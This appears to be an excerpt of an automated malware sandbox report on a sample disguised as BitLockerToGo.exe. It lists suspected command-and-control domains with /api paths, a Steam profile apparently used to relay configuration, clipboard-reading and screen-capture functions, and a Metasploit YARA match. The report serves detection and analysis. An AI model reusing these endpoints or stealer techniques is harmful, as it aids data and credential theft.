                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xT%
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/im
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.co
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/api
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/k
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/l
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: BitLockerToGo.exe, 00000001.00000003.1964000369.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/
                    Source: BitLockerToGo.exe, 00000001.00000003.1964000369.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/apii
                    Source: BitLockerToGo.exe, 00000001.00000003.1964000369.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/k
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/U
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiS
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apie
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/r
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F765611997
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steamp
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampo
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/st
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016710572.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016726223.0000000000648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manag
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manag-s
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.4:49741 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49744 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49746 version: TLS 1.2
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00436E30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_00436E30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00436E30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_00436E30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00436FC0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,1_2_00436FC0

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000000.00000002.1919656324.0000000003CD6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043C27A1_2_0043C27A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040F3401_2_0040F340
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00410CE01_2_00410CE0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004230501_2_00423050
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004270641_2_00427064
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004010001_2_00401000
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042C0001_2_0042C000
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040B0101_2_0040B010
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004410101_2_00441010
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004460301_2_00446030
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004301701_2_00430170
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042E1081_2_0042E108
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004451901_2_00445190
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043A24C1_2_0043A24C
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042B2D01_2_0042B2D0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040135C1_2_0040135C
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004303001_2_00430300
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004013111_2_00401311
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004463101_2_00446310
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041E3301_2_0041E330
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040D3D01_2_0040D3D0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004433BA1_2_004433BA
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041D4401_2_0041D440
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041243E1_2_0041243E
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004014C01_2_004014C0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040A4F01_2_0040A4F0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004444A01_2_004444A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042E4B21_2_0042E4B2
